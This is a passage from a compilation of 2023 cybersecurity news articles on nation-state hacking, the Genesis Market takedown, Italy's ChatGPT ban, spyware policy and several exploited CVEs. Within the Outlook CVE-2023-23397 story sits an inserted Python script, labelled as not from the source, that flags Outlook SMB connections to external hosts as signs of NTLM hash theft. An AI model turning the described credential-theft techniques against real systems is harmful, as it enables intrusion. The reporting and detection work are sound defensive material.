The fifth vulnerability included in the list is an information disclosure flaw in Arm Mali GPU Kernel Driver (CVE-2023-26083) that was revealed by Google's Threat Analysis Group (TAG) last month as abused by an unnamed spyware vendor as part of an exploit chain to break into Samsung's Android smartphones.
Federal Civilian Executive Branch (FCEB) agencies have until April 28, 2023, to apply the patches to secure their networks against potential threats.
The advisory also comes as Apple released updates for iOS, iPadOS, macOS, and Safari web browser to address a pair of zero-day flaws (CVE-2023-28205 and CVE-2023-28206) that it said has been exploited in real-world attacks.
Update:
CISA, on April 10, 2023, added the two Apple zero-day vulnerabilities to the KEV catalog, urging FCEB agencies to secure iOS, iPadOS, and macOS devices by May 1, 2023.
Iran-Based Hackers Caught Carrying Out Destructive Attacks Under Ransomware Guise
8.4.23 BigBrothers The Hacker News
The Iranian nation-state group known as MuddyWater has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation.
That's according to new findings from the Microsoft Threat Intelligence team, which discovered the threat actor targeting both on-premises and cloud infrastructures in partnership with another emerging activity cluster dubbed DEV-1084.
"While the threat actors attempted to masquerade the activity as a standard ransomware campaign, the unrecoverable actions show destruction and disruption were the ultimate goals of the operation," the tech giant revealed Friday.
MuddyWater is the name assigned to an Iran-based actor that the U.S. government has publicly connected to the country's Ministry of Intelligence and Security (MOIS). It's been known to be active since at least 2017.
It's also tracked by the cybersecurity community under various names, including Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mercury, Seedworm, Static Kitten, TEMP.Zagros, and Yellow Nix.
Attacks mounted by the group have primarily singled out Middle Eastern nations, with intrusions observed over the past year leveraging the Log4Shell flaw to breach Israeli entities.
The latest findings from Microsoft reveal the threat actor probably worked together with DEV-1084 to pull off the attack, the latter of which conducted the destructive actions after MuddyWater successfully gained a foothold onto the target environment.
"Mercury likely exploited known vulnerabilities in unpatched applications for initial access before handing off access to DEV-1084 to perform extensive reconnaissance and discovery, establish persistence, and move laterally throughout the network, oftentimes waiting weeks and sometimes months before progressing to the next stage," Microsoft said.
In the activity detected by Redmond, DEV-1084 subsequently abused highly privileged compromised credentials to perform encryption of on-premise devices and large-scale deletion of cloud resources, including server farms, virtual machines, storage accounts, and virtual networks.
Furthermore, the threat actors gained full access to email inboxes through Exchange Web Services, using it to perform "thousands of search activities" and impersonate an unnamed high-ranking employee to send messages to both internal and external recipients.
All these actions are estimated to have transpired over a roughly three-hour timeframe starting at 12:38 a.m. (when the attacker logged into the Microsoft Azure environment via compromised credentials) and ending at 3:21 a.m. (when the attacker sent emails to other parties after the successful cloud disruption).
It's worth noting here that DEV-1084 refers to the same threat actor that assumed the "DarkBit" persona as part of a ransomware and extortion attack aimed at Technion, a leading research university in Israel, in February. The Israel National Cyber Directorate, last month, attributed the attack to MuddyWater.
"DEV-1084 [...] presented itself as a criminal actor interested in extortion, likely as an attempt to obfuscate Iran's link to and strategic motivation for the attack," Microsoft added.
The links between Mercury and DEV-1084 originate from infrastructure, IP address, and tooling overlaps, with the latter observed using a reverse tunneling utility called Ligolo, a staple MuddyWater artifact.
That said, there is not ample evidence to determine if DEV-1084 operates independently of MuddyWater and collaborates with other Iranian actors, or if it's a sub-team that's only summoned when there is a need to conduct a destructive attack.
Cisco Talos, early last year, described MuddyWater as a "conglomerate" comprising several smaller clusters rather than a single, cohesive group. The emergence of DEV-1084 suggests a nod in this direction.
"While these teams seem to operate independently, they are all motivated by the same factors that align with Iranian national security objectives, including espionage, intellectual theft, and destructive or disruptive operations based on the victims they target," Talos noted in March 2022.
FBI Cracks Down on Genesis Market: 119 Arrested in Cybercrime Crackdown
6.4.23 BigBrothers The Hacker News
A coordinated international law enforcement operation has dismantled Genesis Market, an illegal online marketplace that specialized in the sale of stolen credentials associated with email, bank accounts, and social media platforms.
Coinciding with the infrastructure seizure, the major crackdown, which involved authorities from 17 countries, culminated in 119 arrests and 208 property searches in 13 nations. However, the .onion mirror of the market appears to be still up and running.
The "unprecedented" law enforcement exercise has been codenamed Operation Cookie Monster.
Genesis Market, since its inception in March 2018, evolved into a major hub for criminal activities, offering access to data stolen from over 1.5 million compromised computers across the world totaling more than 80 million credentials.
A majority of infections associated with Genesis Market related malware have been detected in the U.S., Mexico, Germany, Turkey, Sweden, Italy, France, Spain, Poland, Ukraine, Saudi Arabia, India, Pakistan, and Indonesia, among others, per data gathered by Trellix.
Some of the prominent malware families that were leveraged to compromise victims encompass AZORult, Raccoon, RedLine, and DanaBot, which are all capable of stealing sensitive information from users' systems. Also delivered through DanaBot is a rogue Chrome extension designed to siphon browser data.
"Account access credentials advertised for sale on Genesis Market included those connected to the financial sector, critical infrastructure, and federal, state, and local government agencies," the U.S. Department of Justice (DoJ) said in a statement.
The DoJ called Genesis Market one of the "most prolific initial access brokers (IABs) in the cybercrime world." The U.S. Treasury Department, in a coordinated announcement, sanctioned the criminal shop, describing it as a "key resource" used by threat actors to target U.S. government organizations.
Besides credentials, Genesis also peddled device fingerprints – which include unique identifiers and browser cookies – so as to help threat actors circumvent anti-fraud detection systems used by many websites.
"The combination of stolen access credentials, fingerprints, and cookies allowed purchasers to assume the identity of the victim by tricking third party websites into thinking the Genesis Market user was the actual owner of the account," the DoJ added.
Court documents reveal that the U.S. Federal Bureau of Investigation (FBI) gained access to Genesis Market's backend servers twice in December 2020 and May 2022, enabling the agency to access information pertaining to about 59,000 users of the cybercrime bazaar.
The packages of stolen information harvested from infected computers (aka "bots") were sold for anywhere between $0.70 and several hundred dollars depending on the nature of the data, according to Europol and Eurojust.
"The most expensive would contain financial information which would allow access to online banking accounts," Europol noted, stating the criminals purchasing the data were also provided with additional tools to use it without attracting attention.
"Buyers were provided with a custom browser which would mimic the one of their victim. This allowed the criminals to access their victim's account without triggering any of the security measures from the platform the account was on."
The proprietary Chromium-based browser, referred to as Genesium, is cross-platform, with the maintainers claiming features such as "anonymous surfing" and other advanced functionalities that permit its users to bypass anti-fraud systems.
Genesis Market, unlike Hydra and other illicit marketplaces, was also accessible over the clearnet, thereby lowering the barrier of entry for lesser-skilled threat actors looking to obtain digital identities in order to breach individual accounts and enterprise systems.
The takedown is expected to have a "ripple effect throughout the underground economy" as threat actors search for alternatives to fill the void left by Genesis Market.
Genesis Market is the latest in a long line of illegitimate services that have been taken down by law enforcement. It also arrives exactly a year after the dismantling of Hydra, which was felled by German authorities in April 2022 and created a "seismic shift in the Russian-language darknet marketplace landscape."
"Almost a year after Hydra's takedown, five markets — Mega, Blacksprut, Solaris, Kraken, and OMG!OMG! Market — have emerged as the biggest players based on the volume of offers and the number of sellers," Flashpoint said in a new report.
The development also follows the launch of a new dark web marketplace known as STYX that's primarily geared towards financial fraud, money laundering, and identity theft. It's said to have opened its doors around January 19, 2023.
"Some examples of the specific service offerings marketed on STYX include cash-out services, data dumps, SIM cards, DDOS, 2FA/SMS bypass, fake and stolen ID documents, banking malware, and much more," Resecurity said in a detailed writeup.
Like Genesis Market, STYX also offers utilities that are designed to get around anti-fraud solutions and access compromised accounts by using granular digital identifiers like stolen cookie files, physical device data, and network settings to spoof legitimate customer logins.
The emergence of STYX as a new platform in the commercial cybercriminal ecosystem is yet another sign that the market for illegal services continues to be a fruitful business, allowing bad actors to profit from credential theft and payment data.
"The majority of STYX Marketplace vendors specialize in fraud and money laundering services targeting popular digital banking platforms, online-marketplaces, e-commerce and other payment applications," Resecurity noted. "The geographies targeted by these threat actors are global, spanning the U.S., E.U., U.K., Canada, Australia and multiple countries in APAC and Middle East."
Google TAG Warns of North Korean-linked ARCHIPELAGO Cyberattacks
5.4.23 BigBrothers The Hacker News
A North Korean government-backed threat actor has been linked to attacks targeting government and military personnel, think tanks, policy makers, academics, and researchers in South Korea and the U.S.
Google's Threat Analysis Group (TAG) is tracking the cluster under the name ARCHIPELAGO, which it said is a subset of another threat group tracked by Mandiant under the name APT43.
The tech giant said it began monitoring the hacking crew in 2012, adding it has "observed the group target individuals with expertise in North Korea policy issues such as sanctions, human rights, and non-proliferation issues."
The priorities of APT43, and by extension ARCHIPELAGO, are said to align with North Korea's Reconnaissance General Bureau (RGB), the primary foreign intelligence service, suggesting overlaps with a group broadly known as Kimsuky.
Attack chains mounted by ARCHIPELAGO involve the use of phishing emails containing malicious links that, when clicked by the recipients, redirect to fake login pages that are designed to harvest credentials.
These messages purport to be from media outlets and think tanks and seek to entice targets under the pretext of requesting interviews or additional information about North Korea.
"ARCHIPELAGO invests time and effort to build a rapport with targets, often corresponding with them by email over several days or weeks before finally sending a malicious link or file," TAG said.
The threat actor is also known to employ the browser-in-the-browser (BitB) technique to render rogue login pages inside an actual window to steal credentials.
What's more, the phishing messages have posed as Google account security alerts to activate the infection, with the adversarial collective hosting malware payloads like BabyShark on Google Drive in the form of blank files or ISO optical disc images.
Another notable technique adopted by ARCHIPELAGO is the use of fraudulent Google Chrome extensions to harvest sensitive data, as evidenced in prior campaigns dubbed Stolen Pencil and SharpTongue.
The development comes as AhnLab Security Emergency Response Center (ASEC) detailed Kimsuky's use of Alternate Data Stream (ADS) and weaponized Microsoft Word files to deliver info-stealer malware.
Italian Watchdog Bans OpenAI's ChatGPT Over Data Protection Concerns
4.4.23 BigBrothers The Hacker News
The Italian data protection watchdog, Garante per la Protezione dei Dati Personali (aka Garante), has imposed a temporary ban of OpenAI's ChatGPT service in the country, citing data protection concerns.
To that end, it has ordered the company to stop processing users' data with immediate effect, stating it intends to investigate the company over whether it's unlawfully processing such data in violation of the E.U. General Data Protection Regulation (GDPR) laws.
"No information is provided to users and data subjects whose data are collected by Open AI," the Garante noted. "More importantly, there appears to be no legal basis underpinning the massive collection and processing of personal data in order to 'train' the algorithms on which the platform relies."
ChatGPT, which is estimated to have reached over 100 million monthly active users since its release late last year, has not disclosed what it used to train its latest large language model (LLM), GPT-4, or how it trained it.
That said, its predecessor GPT-3 utilizes text sourced from books, Wikipedia, and Common Crawl, the latter of which maintains an "open repository of web crawl data that can be accessed and analyzed by anyone."
The Garante also pointed to the lack of any age verification system to prevent minors from accessing the service, potentially exposing them to "inappropriate" responses. Google's own chatbot, called Bard, is only open to users over the age of 18.
Additionally, the regulator raised questions about the accuracy of the information surfaced by ChatGPT, while also highlighting a data breach the service suffered earlier last month that exposed some users' chat titles and payment-related information.
In response to the order, OpenAI has blocked its generative AI chatbot from being accessed by users with an Italian IP address. It also said it's issuing refunds to subscribers of ChatGPT Plus, in addition to pausing subscription renewals.
The San Francisco-based company further emphasized that it provides ChatGPT in compliance with GDPR and other privacy laws. ChatGPT is already blocked in China, Iran, North Korea, and Russia.
In a statement shared with Reuters, OpenAI said it actively works to "reduce personal data in training our AI systems like ChatGPT because we want our AI to learn about the world, not about private individuals."
OpenAI has 20 days to notify the Garante of the measures it has taken to bring it in compliance, or risk facing fines of up to €20 million or 4% of the total worldwide annual turnover, whichever is higher.
The ban, however, is not expected to impact applications from other companies that employ OpenAI's technology to augment their services, including Microsoft's Bing search engine and its Copilot offerings.
The development also comes as Europol warned that LLMs like ChatGPT are likely to help generate malicious code, facilitate fraud, and "offer criminals new opportunities, especially for crimes involving social engineering, given its abilities to respond to messages in context and adopt a specific writing style."
This is not the first time AI-focused companies have come under the radar. Last year, controversial facial recognition firm Clearview AI was fined by multiple European regulators for scraping users' publicly available photos without consent to train its identity-matching service.
It has also run afoul of privacy laws in Australia, Canada, and the U.S., with several countries ordering the company to delete all of the data it obtained in such a manner.
Clearview AI told the BBC News last week that it has run nearly a million searches for U.S. law enforcement agencies, despite being permanently banned from selling its faceprint database within the country.
Pakistan-Origin SideCopy Linked to New Cyberattack on India's Ministry of Defence
28.3.23 BigBrothers The Hacker News
An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT.
According to Cyble, which attributed the operation to SideCopy, the activity cluster is designed to target the Defence Research and Development Organization (DRDO), the research and development wing of India's Ministry of Defence.
Known for emulating the infection chains associated with SideWinder to deliver its own malware, SideCopy is a threat group of Pakistani origin that shares overlaps with Transparent Tribe. It has been active since at least 2019.
Attack chains mounted by the group involve using spear-phishing emails to gain initial access. These messages come bearing a ZIP archive file that contains a Windows shortcut file (.LNK) masquerading as information about the K-4 ballistic missile developed by DRDO.
Executing the .LNK file leads to the retrieval of an HTML application from a remote server, which, in turn, displays a decoy presentation, while also stealthily deploying the Action RAT backdoor.
The malware, in addition to gathering information about the victim machine, is capable of running commands sent from a command-and-control (C2) server, including harvesting files and dropping follow-on malware.
Also deployed is a new information-stealing malware referred to as AuTo Stealer that's equipped to gather and exfiltrate Microsoft Office files, PDF documents, database and text files, and images over HTTP or TCP.
"The APT group continuously evolves its techniques while incorporating new tools into its arsenal," Cyble noted.
This is not the first time SideCopy has employed Action RAT in its attacks directed against India. In December 2021, Malwarebytes disclosed a set of intrusions that breached a number of ministries in Afghanistan and a shared government computer in India to steal sensitive credentials.
The latest findings arrive a month after the adversarial crew was spotted targeting Indian government agencies with a remote access trojan dubbed ReverseRAT.
President Biden Signs Executive Order Restricting Use of Commercial Spyware
28.3.23 BigBrothers The Hacker News
U.S. President Joe Biden on Monday signed an executive order that restricts the use of commercial spyware by federal government agencies.
The order said the spyware ecosystem "poses significant counterintelligence or security risks to the United States Government or significant risks of improper use by a foreign government or foreign person."
It also seeks to ensure that the government's use of such tools is done in a manner that's "consistent with respect for the rule of law, human rights, and democratic norms and values."
To that end, the order lays out the various criteria under which commercial spyware could be disqualified for use by U.S. government agencies. They include -
The purchase of commercial spyware by a foreign government or person to target the U.S. government,
A commercial spyware vendor that uses or discloses sensitive data obtained from the cyber surveillance tool without authorization and operates under the control of a foreign government that's engaged in espionage activities aimed at the U.S.,
A foreign threat actor that uses commercial spyware against activists and dissidents with the goal of limiting freedom of expression or perpetrating human rights abuses,
A foreign threat actor that uses commercial spyware to keep tabs on a U.S. citizen without legal authorization, safeguards, and oversight, and
The sales of commercial spyware to governments that have a record of engaging in systematic acts of political repression and other human rights violations.
"This Executive Order will also serve as a foundation to deepen international cooperation to promote responsible use of surveillance technology, counter the proliferation and misuse of such technology, and spur industry reform," the White House said in a statement.
About 50 U.S. government officials in senior positions located in at least 10 countries are estimated to have been infected or targeted by such spyware to date, the Wall Street Journal reported, a number larger than previously known.
While the order stops short of an outright ban, the development comes as sophisticated and invasive surveillance tools are being increasingly deployed to access electronic devices remotely using zero-click exploits and extract valuable information about targets without their knowledge or consent.
Last week, the New York Times reported that Artemis Seaford, a former security policy manager at Meta, had her phone wiretapped and hacked by Greece's national intelligence agency using Predator, a spyware developed by Cytrox.
That said, the order also leaves open the possibility of other kinds of spyware devices, including IMSI catchers, being used by government agencies to glean valuable intelligence.
Viewed in that light, it's also an acknowledgment that the spyware-for-sale industry plays an important role in intelligence-gathering operations even as the technology constitutes a growing counterintelligence and national security risk to government personnel.
Earlier this month, the Federal Bureau of Investigation (FBI) confirmed that the agency has in the past purchased the location data of U.S. citizens from data brokers as a means to sidestep the traditional warrant process.
The FBI is also alleged to have bought a license for Israeli company NSO Group's Pegasus during 2020 and 2021, acknowledging that it was used for research and development purposes.
The Drug Enforcement Administration (DEA), in a similar fashion, uses Graphite, a spyware tool produced by another Israeli company named Paragon, for counternarcotics operations. It's not immediately clear if other U.S. federal agencies currently use any commercial spyware.
Microsoft Warns of Stealthy Outlook Vulnerability Exploited by Russian Hackers
25.3.23 BigBrothers The Hacker News
Microsoft on Friday shared guidance to help customers discover indicators of compromise (IoCs) associated with a recently patched Outlook vulnerability.
Tracked as CVE-2023-23397 (CVSS score: 9.8), the critical flaw relates to a case of privilege escalation that could be exploited to steal NT LAN Manager (NTLM) hashes and stage a relay attack without requiring any user interaction.
"External attackers could send specially crafted emails that will cause a connection from the victim to an untrusted location of attackers' control," the company noted in an advisory released this month.
"This will leak the Net-NTLMv2 hash of the victim to the untrusted network which an attacker can then relay to another service and authenticate as the victim."
The vulnerability was resolved by Microsoft as part of its Patch Tuesday updates for March 2023, but not before Russia-based threat actors weaponized the flaw in attacks targeting government, transportation, energy, and military sectors in Europe.
Microsoft's incident response team said it found evidence of potential exploitation of the shortcoming as early as April 2022.
In one attack chain described by the tech giant, a successful Net-NTLMv2 Relay attack enabled the threat actor to gain unauthorized access to an Exchange Server and modify mailbox folder permissions for persistent access.
The compromised email account was then used to extend the adversary's access within the compromised environment by sending additional malicious messages to target other members of the same organization.
"While leveraging NTLMv2 hashes to gain unauthorized access to resources is not a new technique, the exploitation of CVE-2023-23397 is novel and stealthy," Microsoft said.
"Organizations should review SMBClient event logging, Process Creation events, and other available network telemetry to identify potential exploitation via CVE-2023-23397."
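As an added illustration of the telemetry review Microsoft recommends (example code, not from Microsoft or The Hacker News), the script below scans constructed endpoint connection records and flags Outlook itself opening SMB (port 445) sessions to addresses outside an assumed set of internal ranges; the record format and the internal ranges are assumptions.

```python
import ipaddress
import re
from typing import Dict, List

# Constructed sample of endpoint network telemetry (not real logs): one
# outbound connection per line with the initiating process and destination.
SAMPLE_TELEMETRY = """\
2023-03-15T09:12:01Z host=WS01 proc=outlook.exe dst=10.20.30.5 dport=445
2023-03-15T09:12:07Z host=WS01 proc=outlook.exe dst=203.0.113.77 dport=445
2023-03-15T09:13:22Z host=WS01 proc=chrome.exe dst=198.51.100.9 dport=443
2023-03-15T09:14:40Z host=WS02 proc=explorer.exe dst=192.168.1.10 dport=445
2023-03-15T09:15:03Z host=WS02 proc=outlook.exe dst=198.51.100.45 dport=445
"""

# Assumed internal address space; a real deployment would use its own ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) proc=(?P<proc>\S+) "
    r"dst=(?P<dst>\S+) dport=(?P<dport>\d+)$"
)


def parse_line(line: str) -> Dict[str, str]:
    """Split one telemetry record into its fields; reject unknown layouts."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised telemetry line: {line!r}")
    return m.groupdict()


def is_suspicious(rec: Dict[str, str]) -> bool:
    """Outlook initiating SMB to a non-internal host matches the pattern in
    Microsoft's guidance: the crafted message makes the client reach out to
    an attacker-controlled share and leak the Net-NTLMv2 hash."""
    if rec["proc"].lower() != "outlook.exe" or rec["dport"] != "445":
        return False
    addr = ipaddress.ip_address(rec["dst"])
    return not any(addr in net for net in INTERNAL_NETS)


def find_suspicious(telemetry: str) -> List[Dict[str, str]]:
    """Return every record that should be triaged as possible CVE-2023-23397 use."""
    return [r for r in map(parse_line, telemetry.splitlines()) if is_suspicious(r)]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_TELEMETRY):
        print(f"{hit['ts']} {hit['host']}: outlook.exe -> {hit['dst']}:445 (external SMB)")
```

Internal-to-internal SMB from Outlook is left alone because it is routine (mapped drives, Exchange on-premises), so the filter keeps analyst attention on the external relay case the advisory describes.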
The disclosure comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a new open source incident response tool that helps detect signs of malicious activity in Microsoft cloud environments.
Dubbed Untitled Goose Tool, the Python-based utility offers "novel authentication and data gathering methods" to analyze Microsoft Azure, Azure Active Directory, and Microsoft 365 environments, the agency said.
Earlier this year, Microsoft also urged customers to keep their on-premises Exchange servers updated as well as take steps to bolster their networks to mitigate potential threats.
Researchers Uncover Chinese Nation State Hackers' Deceptive Attack Strategies
24.3.23 BigBrothers The Hacker News
A recent campaign undertaken by Earth Preta indicates that nation-state groups aligned with China are getting increasingly proficient at bypassing security solutions.
The threat actor, active since at least 2012, is tracked by the broader cybersecurity community under Bronze President, HoneyMyte, Mustang Panda, RedDelta, and Red Lich.
Attack chains mounted by the group commence with a spear-phishing email to deploy a wide range of tools for backdoor access, command-and-control (C2), and data exfiltration.
These messages come bearing malicious lure archives distributed via Dropbox or Google Drive links that employ DLL side-loading, LNK shortcut files, and fake file extensions as arrival vectors to obtain a foothold and drop backdoors like TONEINS, TONESHELL, PUBLOAD, and MQsTTang (aka QMAGENT).
Similar infection chains utilizing Google Drive links have been observed delivering Cobalt Strike as early as April 2021.
"Earth Preta tends to hide malicious payloads in fake files, disguising them as legitimate ones — a technique that has been proven effective for avoiding detection," Trend Micro said in a new analysis published Thursday.
This entry point method, which was first spotted late last year, has since received a slight tweak wherein the download link to the archive is embedded within another decoy document and the file is password-protected in an attempt to sidestep email gateway solutions.
"The files can then be extracted inside via the password provided in the document," the researchers said. "By using this technique, the malicious actor behind the attack can successfully bypass scanning services."
Initial access to the victim's environment is followed by account discovery and privilege escalation phases, with Mustang Panda leveraging custom tools like ABPASS and CCPASS to circumvent User Account Control (UAC) in Windows 10.
Additionally, the threat actor has been observed deploying malware such as "USB Driver.exe" (HIUPAN or MISTCLOAK) and "rzlog4cpp.dll" (ACNSHELL or BLUEHAZE) to install themselves to removable disks and create a reverse shell with the goal of laterally moving across the network.
Other utilities deployed include CLEXEC, a backdoor capable of executing commands and clearing event logs; COOLCLIENT and TROCLIENT, implants that are designed to record keystrokes as well as read and delete files; and PlugX.
"Apart from well-known legitimate tools, the threat actors also crafted highly customized tools used for exfiltration," the researchers noted. This comprises NUPAKAGE and ZPAKAGE, both of which are equipped to collect Microsoft Office files.
The findings once again highlight the increased operational tempo of Chinese cyber espionage actors and their consistent investment in advancing their cyber weaponry to evade detection.
"Earth Preta is a capable and organized threat actor that is continuously honing its TTPs, strengthening its development capabilities, and building a versatile arsenal of tools and malware," the researchers concluded.
From Ransomware to Cyber Espionage: 55 Zero-Day Vulnerabilities Weaponized in 2022
22.3.23 BigBrothers The Hacker News
As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple.
While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still marks a significant uptick over recent years in threat actors leveraging unknown security flaws to their advantage.
The findings come from threat intelligence firm Mandiant, which noted that desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six) accounted for the most exploited product types.
Of the 55 zero-day bugs, 13 are estimated to have been abused by cyber espionage groups, with four others exploited by financially motivated threat actors for ransomware-related operations. Commercial spyware vendors were linked to the exploitation of three zero-days.
Among state-sponsored groups, those attributed to China have emerged as the most prolific, exploiting seven zero-days – CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328 – during the year.
Much of the exploitation has focused on vulnerabilities in edge network devices such as firewalls for obtaining initial access. Various China-nexus clusters have also been spotted leveraging a flaw in Microsoft Diagnostics Tool (aka Follina) as part of disparate campaigns.
"Multiple separate campaigns may indicate that the zero-day was distributed to multiple suspected Chinese espionage clusters via a digital quartermaster," Mandiant said, adding it points to the "existence of a shared development and logistics infrastructure and possibly a centralized coordinating entity."
North Korean and Russian threat actors, on the other hand, have been linked to the exploitation of two zero-days each. This includes CVE-2022-0609, CVE-2022-41128, CVE-2022-30190, and CVE-2023-23397.
The disclosure comes as threat actors are also getting better at turning newly disclosed vulnerabilities into powerful exploits for breaching a wide range of targets across the world.
"While the discovery of zero-day vulnerabilities is a resource-intensive endeavor and successful exploitation is not guaranteed, the total number of vulnerabilities disclosed and exploited has continued to grow, the types of targeted software, including Internet of Things (IoT) devices and cloud solutions, continue to evolve, and the variety of actors exploiting them has expanded," Mandiant said.
The Mandiant report also follows a warning from Microsoft's Digital Threat Analysis Center about Russia's persistent kinetic and cyber targeting as the war in Ukraine continues into the second year.
The tech giant said since January 2023 it has observed "Russian cyber threat activity adjusting to boost destructive and intelligence gathering capacity on Ukraine and its partners' civilian and military assets."
It further warned of a possible "renewed destructive campaign" mounted by the nation-state group known as Sandworm (aka Iridium) on organizations located in Ukraine and elsewhere.
What's more, Kremlin-backed hackers have deployed at least two ransomware and nine wiper families against over 100 Ukrainian entities. No less than 17 European countries have been targeted in espionage campaigns between January and mid-February 2023, and 74 countries have been targeted since the start of the war.
Other key traits associated with Russian threat activity include the use of ransomware as weapons of cyber sabotage, gaining initial access through diverse methods, and leveraging real and pseudo hacktivist groups to expand the reach of Moscow's cyber presence.
CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild
16.3.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution.
"Adobe ColdFusion contains an improper access control vulnerability that allows for remote code execution," CISA said.
The vulnerability impacts ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, respectively, released on March 14, 2023.
It's worth noting that CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations, both of which are no longer supported by the software company as they have reached end-of-life (EoL).
While the exact details surrounding the nature of the attacks are unknown, Adobe said in an advisory that it's aware of the flaw being "exploited in the wild in very limited attacks."
Federal Civilian Executive Branch (FCEB) agencies are required to apply the updates by April 5, 2023, to safeguard their networks against potential threats.
Charlie Arehart, a security researcher credited with discovering and reporting the flaw alongside Pete Freitag, described it as a "grave" issue that could result in "arbitrary code execution" and "arbitrary file system read."